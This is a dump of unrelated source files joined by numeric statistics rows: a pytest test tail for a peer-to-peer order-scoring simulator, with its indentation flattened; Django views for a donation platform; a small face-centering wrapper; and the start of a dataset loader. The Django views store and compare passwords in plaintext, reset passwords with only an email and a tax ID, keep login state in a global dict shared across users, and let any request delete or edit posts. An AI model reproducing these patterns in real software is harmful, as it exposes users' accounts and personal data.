def fake_store_or_discard_orders(peer):
for orderinfo_list in peer.order_pending_orderinfo_mapping.values():
for orderinfo in orderinfo_list:
if orderinfo.prev_owner == neighbor:
orderinfo.storage_decision = True
else:
orderinfo.storage_decision = False
monkeypatch.setattr(engine, "store_or_discard_orders", fake_store_or_discard_orders)
# Act.
# neighbor sends the order to my_peer
my_peer.receive_order_internal(neighbor, order)
# store orders
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# calculate scores. The value equals to the last entry of the score sheet.
my_peer.score_neighbors()
# Assert.
assert my_peer.peer_neighbor_mapping[neighbor].score == 7
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_scoring_system_reward_e(scenario, engine, monkeypatch) -> None:
"""
    This function tests the case for reward_e
"""
# Setting for this case:
# my_peer's initial status:
# Pending table: there is a pending orderinfo instance from the competitor.
# Behavior: neighbor sends order to my_peer
# Result: Order from neighbor not stored since competitor won over neighbor (reward_e).
# Arrange.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
competitor: Peer = create_a_test_peer(scenario, engine)[0]
order: Order = create_a_test_order(scenario)
# establish neighborhood
for anyone in (neighbor, competitor):
my_peer.add_neighbor(anyone)
anyone.add_neighbor(my_peer)
# let neighbor and competitor own the order that it should have
for anyone in (neighbor, competitor):
anyone.receive_order_external(order)
anyone.send_orders_to_on_chain_check(anyone.local_clock)
anyone.store_orders()
# setup the initial status for my_peer
my_peer.receive_order_internal(competitor, order)
# clear score sheet for neighbor
my_peer.peer_neighbor_mapping[neighbor].share_contribution[-1] = 0
# define fake functions.
# This fake function sets storage_decision as True for orderinfo from competitor and
# False from neighbor.
def fake_store_or_discard_orders(peer):
for orderinfo_list in peer.order_pending_orderinfo_mapping.values():
for orderinfo in orderinfo_list:
if orderinfo.prev_owner == neighbor:
orderinfo.storage_decision = False
else:
orderinfo.storage_decision = True
monkeypatch.setattr(engine, "store_or_discard_orders", fake_store_or_discard_orders)
# Act.
# neighbor sends the order to my_peer
my_peer.receive_order_internal(neighbor, order)
# store orders
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# calculate scores. The value equals to the last entry of the score sheet.
my_peer.score_neighbors()
# Assert.
assert my_peer.peer_neighbor_mapping[neighbor].score == 11
| 34.509479 | 96 | 0.730619 | 1,995 | 14,563 | 5.052632 | 0.085714 | 0.06131 | 0.028373 | 0.026786 | 0.884722 | 0.874206 | 0.874206 | 0.871131 | 0.871131 | 0.871131 | 0 | 0.003498 | 0.195083 | 14,563 | 421 | 97 | 34.591449 | 0.856424 | 0.329259 | 0 | 0.820809 | 0 | 0 | 0.030866 | 0.019843 | 0 | 0 | 0 | 0 | 0.040462 | 1 | 0.069364 | false | 0 | 0.023121 | 0.00578 | 0.098266 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
74e4ed898a27f2f0e7951d1b8cc8ad0a94ca848a | 28,072 | py | Python | controle_doacoes/doacoes/views.py | henrimory/GoHero | 217d2336d7c9dbb642611742e57e3737bb06bfba | [
"MIT"
] | null | null | null | controle_doacoes/doacoes/views.py | henrimory/GoHero | 217d2336d7c9dbb642611742e57e3737bb06bfba | [
"MIT"
] | null | null | null | controle_doacoes/doacoes/views.py | henrimory/GoHero | 217d2336d7c9dbb642611742e57e3737bb06bfba | [
"MIT"
] | 1 | 2020-12-12T00:49:30.000Z | 2020-12-12T00:49:30.000Z | from typing import Any
from django.shortcuts import render, redirect
from .forms import contato, endereco, formOng, formUser, formPubliDoador, formPubliOng, formOngUp, formUserUp
from .models import Doador, Ong, Publicacao_Ong, Publicacao_Doador, Endereco, Numero_Contato
data = {}
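# The searchName handling below is repeated verbatim in nearly every view.
# A hedged refactoring sketch (hypothetical helper, not wired into the views):
def _search_or_none(request):
    """Fill `data` with users matching the query and return a redirect,
    or None when the query is empty (illustrative only)."""
    nome_search = request.POST.get('searchName')
    if not nome_search:
        return None
    data['compatibleUserOng'] = Ong.objects.filter(nome__contains=nome_search)
    data['compatibleUserDoador'] = Doador.objects.filter(nome__contains=nome_search)
    return redirect('url_search')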
def visitPerfilNotLog(request,pk):
dadosOng = Ong.objects.all()
dadosDoa = Doador.objects.all()
for dado in dadosOng:
if pk == dado.nome:
perfilVisitado = Ong.objects.all().get(nome=pk)
endVisitado = Endereco.objects.get(logradouro=perfilVisitado.id_endereco)
telefone = Numero_Contato.objects.get(telefone=perfilVisitado.id_numero)
postagensVisitado = Publicacao_Ong.objects.filter(id_ong=perfilVisitado).order_by('-data_publicacao')
data['perfilVisitado'] = perfilVisitado
data['tipoVisitado'] = 'ong'
data['endVisitado'] = endVisitado
data['telefone'] = telefone
data['postagensVisitado'] = postagensVisitado
return render(request, 'visitPerfilNotLog.html', data)
for dado in dadosDoa:
if pk == dado.nome:
perfilVisitado = Doador.objects.all().get(nome=pk)
endVisitado = Endereco.objects.get(logradouro=perfilVisitado.id_endereco)
telefone = Numero_Contato.objects.get(telefone=perfilVisitado.id_numero)
postagensVisitado = Publicacao_Doador.objects.filter(id_doador=perfilVisitado).order_by('-data_publicacao')
data['perfilVisitado'] = perfilVisitado
data['telefone'] = telefone
data['tipoVisitado'] = 'doador'
data['endVisitado'] = endVisitado
data['postagensVisitado'] = postagensVisitado
return render(request, 'visitPerfilNotLog.html', data)
def recoverPass(request):
if request.POST:
email = request.POST['emailRec']
cpf = request.POST['cpfRec']
cnpj = request.POST['cnpjRec']
senha = request.POST['senhaRec']
dadoUser = Doador.objects.all()
dadoOng = Ong.objects.all()
if cpf:
for dados in dadoUser:
if dados.email_doador == email and dados.cpf == cpf:
dados.senha = senha
dados.save()
data['recSuces'] = True
data['erroRec'] = False
return redirect('url_login')
else:
for dadosOng in dadoOng:
if dadosOng.email_ong == email and dadosOng.cnpj == cnpj:
dadosOng.senha = senha
dadosOng.save()
data['recSuces'] = True
data['erroRec'] = False
return redirect('url_login')
data['erroRec'] = True
return render(request, 'RecuperarSenha.html', data)
def anuncioOngs(request):
postAnunc = Publicacao_Ong.objects.filter(categoria="EVENTO").order_by('-data_publicacao')
data['postAnunc'] = postAnunc
return render(request, 'anunciosOngs.html', data)
def home(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html', data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
data['recSuces'] = False
return render(request, 'home.html', data)
def homePostOng(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html', data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
postOngs = Publicacao_Ong.objects.all().order_by('-data_publicacao').exclude(id_ong=data['userLog'].pk)
data['postOngs'] = postOngs
data['postDoadores'] = False
return render(request, 'home.html',data)
def homePostDoador(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html',data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
postDoador = Publicacao_Doador.objects.order_by('-data_publicacao').exclude(id_doador=data['userLog'].pk)
data['postOngs'] = False
data['postDoadores'] = postDoador
return render(request,'home.html',data)
def homePostEventos(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html',data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
postEventos = Publicacao_Doador.objects.filter(categoria="EVENTO").order_by('-data_publicacao')
data['postEventos'] = postEventos
postEventosOng = Publicacao_Ong.objects.filter(categoria="EVENTO").order_by('-data_publicacao')
data['postEventosOng'] = postEventosOng
return render(request, 'homeEventos.html',data)
def homePostCalcados(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html',data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
postCal = Publicacao_Doador.objects.filter(categoria="CALÇADO").order_by('-data_publicacao')
postCalOng = Publicacao_Ong.objects.filter(categoria="CALÇADO").order_by('-data_publicacao')
data['postCalOng'] = postCalOng
data['postCal'] = postCal
return render(request, 'homeCal.html',data)
def homePostRoupas(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html',data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
postRoupas = Publicacao_Doador.objects.filter(categoria="ROUPA").order_by('-data_publicacao')
postRoupasOng = Publicacao_Ong.objects.filter(categoria="ROUPA").order_by('-data_publicacao')
data['postRoupasOng'] = postRoupasOng
data['postRoupas'] = postRoupas
return render(request, 'homeRoupas.html',data)
def homePostAlimentos(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html',data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
postAlimentos = Publicacao_Doador.objects.filter(categoria="ALIMENTO").order_by('-data_publicacao')
postAlimentosOng = Publicacao_Ong.objects.filter(categoria="ALIMENTO").order_by('-data_publicacao')
data['postAlimentosOng'] = postAlimentosOng
data['postAlimentos'] = postAlimentos
return render(request, 'homeAlimentos.html',data)
def homePostMoveis(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html',data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
postMoveis = Publicacao_Doador.objects.filter(categoria="MÓVEL").order_by('-data_publicacao')
postMoveisOng = Publicacao_Ong.objects.filter(categoria="MÓVEL").order_by('-data_publicacao')
data['postMoveisOng'] = postMoveisOng
data['postMoveis'] = postMoveis
return render(request, 'homeMoveis.html',data)
def homePostEletrodomesticos(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html',data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
postEletro = Publicacao_Doador.objects.filter(categoria="ELETRODOMÉSTICO").order_by('-data_publicacao')
postEletroOng = Publicacao_Ong.objects.filter(categoria="ELETRODOMÉSTICO").order_by('-data_publicacao')
data['postEletroOng'] = postEletroOng
data['postEletro'] = postEletro
return render(request, 'homeEletro.html',data)
def homePostDoacao(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html',data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
postDoacao = Publicacao_Doador.objects.filter(categoria="DOAÇÃO").order_by('-data_publicacao')
data['postDoacao'] = postDoacao
postDoacaoOng = Publicacao_Ong.objects.filter(categoria="DOAÇÃO").order_by('-data_publicacao')
data['postDoacaoOng'] = postDoacaoOng
return render(request, 'homeDoacao.html',data)
def inicio(request):
data['recSuces'] = False
return render(request, 'inicial.html',data)
def logout(request):
data['acesso'] = False
data['erroLogin'] = False
data['recSuces'] = False
return render(request, 'inicial.html', data)
def login(request):
data['acesso'] = False
data['erroLogin'] = False
if request.POST:
email = request.POST['email']
senha = request.POST['senha']
dadoUser = Doador.objects.all()
dadoOng = Ong.objects.all()
for dados in dadoUser:
if dados.email_doador == email and dados.senha == senha:
data['acesso'] = True
userLog = Doador.objects.all().get(email_doador=email,senha=senha)
searchOng = Ong.objects.all()
searchDoador = Doador.objects.all()
data['searchOng'] = searchOng
data['searchDoador'] = searchDoador
data['userLog'] = userLog
data['tipoUser'] = "doador"
return redirect('url_homePostOng')
for dadosOng in dadoOng:
if dadosOng.email_ong == email and dadosOng.senha == senha:
data['acesso'] = True
userLog = Ong.objects.all().get(email_ong=email, senha=senha)
searchOng = Ong.objects.all()
searchDoador = Doador.objects.all()
data['searchOng'] = searchOng
data['searchDoador'] = searchDoador
data['userLog'] = userLog
data['tipoUser'] = "ong"
return redirect('url_homePostDoador')
data['erroLogin'] = True
data['recSuces'] = False
return render(request, 'login.html', data)
return render(request, 'login.html', data)
def cadastroEndeOng(request):
    form = endereco(request.POST or None, request.FILES or None)  # Endereco (address) form
if form.is_valid():
tel = request.POST['tel']
Numero_Contato.objects.create(telefone=tel)
form.save()
return redirect('url_cadOng')
data['formEndOng'] = form
return render(request, 'cadastroEndeOng.html', data)
def cadastroOng(request):
if request.POST and request.FILES:
nomeOng = request.POST['nomeOng']
cnpj = request.POST['cnpj']
emailOng = request.POST['emailOng']
senhaOng = request.POST['senhaOng']
imgPerfilOng = request.FILES['imgPerfil1']
endereco = Endereco.objects.latest('pk')
telefone = Numero_Contato.objects.latest('pk')
Ong.objects.create(nome=nomeOng,cnpj=cnpj,email_ong=emailOng,senha=senhaOng,imagem=imgPerfilOng,id_endereco=endereco,id_numero=telefone)
return redirect('url_login')
return render(request, 'cadastroOng.html', data)
def cadastroUser(request):
if request.POST and request.FILES:
nomeDoador = request.POST['nomeDoador']
cpf = request.POST['cpf']
emailDoador = request.POST['emailDoador']
senhaDoador = request.POST['senhaDoador']
imgPerfilDoador = request.FILES['imgPerfil1']
endereco = Endereco.objects.latest('pk')
telefone = Numero_Contato.objects.latest('pk')
Doador.objects.create(nome=nomeDoador,cpf=cpf,email_doador=emailDoador,senha=senhaDoador,imagem=imgPerfilDoador,id_endereco=endereco,id_numero=telefone)
return redirect('url_login')
return render(request, 'cadastroUser.html', data)
def cadastroEnde(request):
form = endereco(request.POST or None, request.FILES or None)
if form.is_valid():
tel = request.POST['tel']
Numero_Contato.objects.create(telefone=tel)
form.save()
return redirect('url_cadUser')
data['formEnd'] = form
return render(request, 'cadastroEnde.html', data)
def perfil(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'perfil.html', data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
if data['tipoUser'] == "doador":
postagens = Publicacao_Doador.objects.filter(id_doador=data['userLog']).order_by('-data_publicacao')
data['posts'] = postagens
return render(request, 'perfil.html', data)
elif data['tipoUser'] == "ong":
postagens = Publicacao_Ong.objects.filter(id_ong=data['userLog']).order_by('-data_publicacao')
data['posts'] = postagens
return render(request, 'perfil.html', data)
def infos(request, pk):
if data['tipoUser'] == "ong":
dadosGerais = Ong.objects.get(pk = pk)
formUpdate = formOngUp(request.POST or None,request.FILES or None,instance=dadosGerais)
user = Ong.objects.get(pk=data['userLog'].pk)
elif data['tipoUser'] == "doador":
dadosGerais = Doador.objects.get(pk = pk)
formUpdate = formUserUp(request.POST or None,request.FILES or None,instance=dadosGerais)
user = Doador.objects.get(pk=data['userLog'].pk)
dadosEnde = Endereco.objects.get(logradouro = user.id_endereco)
formUpdateEnd = endereco(request.POST or None, request.FILES or None, instance=dadosEnde)
formUpdateCont = contato(request.POST or None, request.FILES or None, instance=user.id_numero)
if formUpdate.is_valid():
if data['tipoUser'] == "doador":
if request.FILES:
nome = formUpdate.cleaned_data['nome']
email = formUpdate.cleaned_data['email_doador']
cpf = formUpdate.cleaned_data['cpf']
img = request.FILES['imgPerfil1']
doador = Doador.objects.get(nome=data['userLog'])
doador.nome = nome
doador.cpf = cpf
doador.email_doador = email
doador.imagem = img
doador.save()
data['userLog'] = doador
else:
nome = formUpdate.cleaned_data['nome']
email = formUpdate.cleaned_data['email_doador']
cpf = formUpdate.cleaned_data['cpf']
doador = Doador.objects.get(nome=data['userLog'])
doador.nome = nome
doador.cpf = cpf
doador.email_doador = email
doador.save()
data['userLog'] = doador
elif data['tipoUser'] == "ong":
if request.FILES:
nome = formUpdate.cleaned_data['nome']
email = formUpdate.cleaned_data['email_ong']
cnpj = formUpdate.cleaned_data['cnpj']
img = request.FILES['imgPerfil1']
ong = Ong.objects.get(nome=data['userLog'])
ong.nome = nome
ong.cnpj = cnpj
ong.email_ong = email
ong.imagem = img
ong.save()
data['userLog'] = ong
else:
nome = formUpdate.cleaned_data['nome']
email = formUpdate.cleaned_data['email_ong']
cnpj = formUpdate.cleaned_data['cnpj']
ong = Ong.objects.get(nome=data['userLog'])
ong.nome = nome
ong.cnpj = cnpj
ong.email_ong = email
ong.save()
data['userLog'] = ong
return redirect('url_infos',pk)
if formUpdateEnd.is_valid():
formUpdateEnd.save()
return redirect('url_infos', pk)
if formUpdateCont.is_valid():
formUpdateCont.save()
return redirect('url_infos', pk)
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'infos.html', data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
data['formUpdate'] = formUpdate
data['formUpdateEnd'] = formUpdateEnd
data['formCont'] = formUpdateCont
data['userUp'] = user
return render(request, 'infos.html', data)
def deletePostOng(request,pk):
publicacao = Publicacao_Ong.objects.get(pk=pk)
publicacao.delete()
return redirect('url_perfil')
def deletePostDoador(request,pk):
publicacao = Publicacao_Doador.objects.get(pk=pk)
publicacao.delete()
return redirect('url_perfil')
def editPostOng(request,pk):
publicacao = Publicacao_Ong.objects.get(pk=pk)
form = formPubliOng(request.POST or None, request.FILES or None,instance=publicacao)
if form.is_valid():
if request.FILES:
titulo = form.cleaned_data['titulo']
desc = form.cleaned_data['descricao']
catg = form.cleaned_data['categoria']
img = request.FILES['imgPost']
publicacao.titulo = titulo
publicacao.descricao = desc
publicacao.categoria = catg
publicacao.imagem = img
publicacao.save()
return redirect('url_perfil')
else:
titulo = form.cleaned_data['titulo']
desc = form.cleaned_data['descricao']
catg = form.cleaned_data['categoria']
publicacao.titulo = titulo
publicacao.descricao = desc
publicacao.categoria = catg
publicacao.save()
return redirect('url_perfil')
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'editPostOng.html', data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
data['formEditPostOng'] = form
data['publicacao'] = publicacao
return render(request, 'editPostOng.html', data)
def editPostDoador(request, pk):
    publicacao = Publicacao_Doador.objects.get(pk=pk)
    form = formPubliDoador(request.POST or None, request.FILES or None, instance=publicacao)
    if form.is_valid():
        if request.FILES:
            titulo = form.cleaned_data['titulo']
            desc = form.cleaned_data['descricao']
            catg = form.cleaned_data['categoria']
            img = request.FILES['imgPost']
            publicacao.titulo = titulo
            publicacao.descricao = desc
            publicacao.categoria = catg
            publicacao.imagem = img
            publicacao.save()
            return redirect('url_perfil')
        else:
            titulo = form.cleaned_data['titulo']
            desc = form.cleaned_data['descricao']
            catg = form.cleaned_data['categoria']
            publicacao.titulo = titulo
            publicacao.descricao = desc
            publicacao.categoria = catg
            publicacao.save()
            return redirect('url_perfil')
    if request.POST:
        nomeSearch = request.POST.get('searchName')
        if nomeSearch == "":
            return render(request, 'editPostDoador.html', data)
        else:
            compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
            compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
            data['compatibleUserOng'] = compatibleUserOng
            data['compatibleUserDoador'] = compatibleUserDoador
            return redirect('url_search')
    data['formEditPostDoador'] = form
    data['publicacao'] = publicacao
    return render(request, 'editPostDoador.html', data)

def newPost(request, pk):
    form = formPubliDoador(request.POST or None, request.FILES or None)
    if form.is_valid():
        if request.FILES:
            titulo = form.cleaned_data['titulo']
            desc = form.cleaned_data['descricao']
            categ = form.cleaned_data['categoria']
            img = request.FILES['imgPost']
            doador = data['userLog']
            Publicacao_Doador.objects.create(titulo=titulo, descricao=desc, categoria=categ, imagem=img, id_doador=doador)
            return redirect('url_perfil')
    # User search code
    if request.POST:
        nomeSearch = request.POST.get('searchName')
        if nomeSearch == "":
            return render(request, 'newPost.html', data)
        else:
            compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
            compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
            data['compatibleUserOng'] = compatibleUserOng
            data['compatibleUserDoador'] = compatibleUserDoador
            return redirect('url_search')
    data['formPost'] = form
    return render(request, 'newPost.html', data)

def newPostOng(request, pk):
    form = formPubliOng(request.POST or None, request.FILES or None)
    if form.is_valid():
        if request.FILES:
            titulo = form.cleaned_data['titulo']
            desc = form.cleaned_data['descricao']
            categ = form.cleaned_data['categoria']
            img = request.FILES['imgPost']
            ong = data['userLog']
            Publicacao_Ong.objects.create(titulo=titulo, descricao=desc, categoria=categ, imagem=img, id_ong=ong)
            return redirect('url_perfil')
    # User search code
    if request.POST:
        nomeSearch = request.POST.get('searchName')
        if nomeSearch == "":
            return render(request, 'newPost.html', data)
        else:
            compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
            compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
            data['compatibleUserOng'] = compatibleUserOng
            data['compatibleUserDoador'] = compatibleUserDoador
            return redirect('url_search')
    data['formPost'] = form
    return render(request, 'newPost.html', data)

def visitPerfil(request, pk):
    if request.POST:
        nomeSearch = request.POST.get('searchName')
        if nomeSearch == "":
            return render(request, 'visitPerfil.html', data)
        else:
            compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
            compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
            data['compatibleUserOng'] = compatibleUserOng
            data['compatibleUserDoador'] = compatibleUserDoador
            return redirect('url_search')
    dadosOng = Ong.objects.all()
    dadosDoa = Doador.objects.all()
    for dado in dadosOng:
        if pk == dado.nome:
            perfilVisitado = Ong.objects.get(nome=pk)
            endVisitado = Endereco.objects.get(logradouro=perfilVisitado.id_endereco)
            telefone = Numero_Contato.objects.get(telefone=perfilVisitado.id_numero)
            postagensVisitado = Publicacao_Ong.objects.filter(id_ong=perfilVisitado).order_by('-data_publicacao')
            data['perfilVisitado'] = perfilVisitado
            data['tipoVisitado'] = 'ong'
            data['endVisitado'] = endVisitado
            data['telefone'] = telefone
            data['postagensVisitado'] = postagensVisitado
            return render(request, 'visitPerfil.html', data)
    for dado in dadosDoa:
        if pk == dado.nome:
            perfilVisitado = Doador.objects.get(nome=pk)
            endVisitado = Endereco.objects.get(logradouro=perfilVisitado.id_endereco)
            telefone = Numero_Contato.objects.get(telefone=perfilVisitado.id_numero)
            postagensVisitado = Publicacao_Doador.objects.filter(id_doador=perfilVisitado).order_by('-data_publicacao')
            data['perfilVisitado'] = perfilVisitado
            data['telefone'] = telefone
            data['tipoVisitado'] = 'doador'
            data['endVisitado'] = endVisitado
            data['postagensVisitado'] = postagensVisitado
            return render(request, 'visitPerfil.html', data)
    # Fallback so the view always returns a response when no profile matches.
    return render(request, 'visitPerfil.html', data)

def search(request):
    if request.POST:
        nomeSearch = request.POST.get('searchName')
        if nomeSearch == "":
            return render(request, 'searchPerfil.html', data)
        else:
            compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
            compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
            data['compatibleUserOng'] = compatibleUserOng
            data['compatibleUserDoador'] = compatibleUserDoador
            return redirect('url_search')
    return render(request, 'searchPerfil.html', data)
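
# Illustrative only: a minimal sketch of how the views above could be routed.
# The URL paths and most route names below are assumptions; only url_search is
# taken from the redirect() calls in this module, and url_perfil/url_infos point
# at views defined earlier in the app.
# from django.urls import path
# from . import views
#
# urlpatterns = [
#     path('search/', views.search, name='url_search'),
#     path('perfil/visitar/<str:pk>/', views.visitPerfil, name='url_visit'),
#     path('post/novo/<int:pk>/', views.newPost, name='url_new_post'),
#     path('post/ong/novo/<int:pk>/', views.newPostOng, name='url_new_post_ong'),
#     path('post/ong/editar/<int:pk>/', views.editPostOng, name='url_edit_post_ong'),
#     path('post/ong/apagar/<int:pk>/', views.deletePostOng, name='url_delete_post_ong'),
# ]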
| 44.347551 | 160 | 0.639962 | 2,709 | 28,072 | 6.530454 | 0.073828 | 0.041038 | 0.0537 | 0.050873 | 0.814708 | 0.791872 | 0.75886 | 0.739981 | 0.701769 | 0.674467 | 0 | 0.00019 | 0.249822 | 28,072 | 632 | 161 | 44.417722 | 0.839878 | 0.003206 | 0 | 0.728374 | 0 | 0 | 0.134752 | 0.001573 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051903 | false | 0.00173 | 0.00692 | 0 | 0.209343 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2d190ed5be733bf79dccb566dcd6257042831f0b | 178 | py | Python | ImageProcessing/cnn.py | OrangeTien/Movie_Data_Capture | 96c6b6ea96b4f16b24f673448c083c209dcd18d1 | [
"MIT"
] | 562 | 2021-12-17T17:23:38.000Z | 2022-03-31T16:32:39.000Z | ImageProcessing/cnn.py | qxzg/Movie_Data_Capture | 3fdcf03d8a15b44e8e6c361329ddd6132b1f7189 | [
"MIT"
] | 123 | 2021-12-18T03:37:48.000Z | 2022-03-30T12:29:21.000Z | ImageProcessing/cnn.py | qxzg/Movie_Data_Capture | 3fdcf03d8a15b44e8e6c361329ddd6132b1f7189 | [
"MIT"
] | 119 | 2021-12-18T03:56:24.000Z | 2022-03-31T08:28:03.000Z | import sys
sys.path.append('../')
from ImageProcessing.hog import face_center as hog_face_center
def face_center(filename, model):
    return hog_face_center(filename, model)
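
# Illustrative usage sketch. The argument names suggest an image path plus a
# detector model; "poster.jpg" and "hog" below are placeholders, not values
# taken from the original repository.
if __name__ == '__main__':
    print(face_center("poster.jpg", "hog"))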
| 19.777778 | 62 | 0.780899 | 26 | 178 | 5.115385 | 0.538462 | 0.300752 | 0.195489 | 0.345865 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.123596 | 178 | 8 | 63 | 22.25 | 0.852564 | 0 | 0 | 0 | 0 | 0 | 0.016854 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
2d2d7365c184c1687f5be4323782b98ac31e4726 | 39,510 | py | Python | MRCpy/datasets/load.py | KARTHEEKCIC/MRCpy | ed91c68fa3538db1bd59867d943f42d5a11e2d98 | [
"MIT"
] | 28 | 2021-03-22T09:41:16.000Z | 2022-03-15T18:21:23.000Z | MRCpy/datasets/load.py | MachineLearningBCAM/Minimax-Risk-Classifiers | 65e4da8fd1907cd7f85b2688c91354a26ff48253 | [
"MIT"
] | 1 | 2021-08-08T14:02:30.000Z | 2021-08-09T10:11:38.000Z | MRCpy/datasets/load.py | MachineLearningBCAM/Minimax-Risk-Classifiers | 65e4da8fd1907cd7f85b2688c91354a26ff48253 | [
"MIT"
] | 1 | 2021-08-09T08:06:26.000Z | 2021-08-09T08:06:26.000Z | import csv
from os.path import dirname, join
import numpy as np
from sklearn.impute import SimpleImputer
from sklearn.utils import Bunch
def normalizeLabels(origY):
    """
    Normalize the labels of the instances in the range 0,...r-1 for r classes
    """
    # Map the values of Y from 0 to r-1
    domY = np.unique(origY)
    Y = np.zeros(origY.shape[0], dtype=int)
    for i, y in enumerate(domY):
        Y[origY == y] = i
    return Y
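
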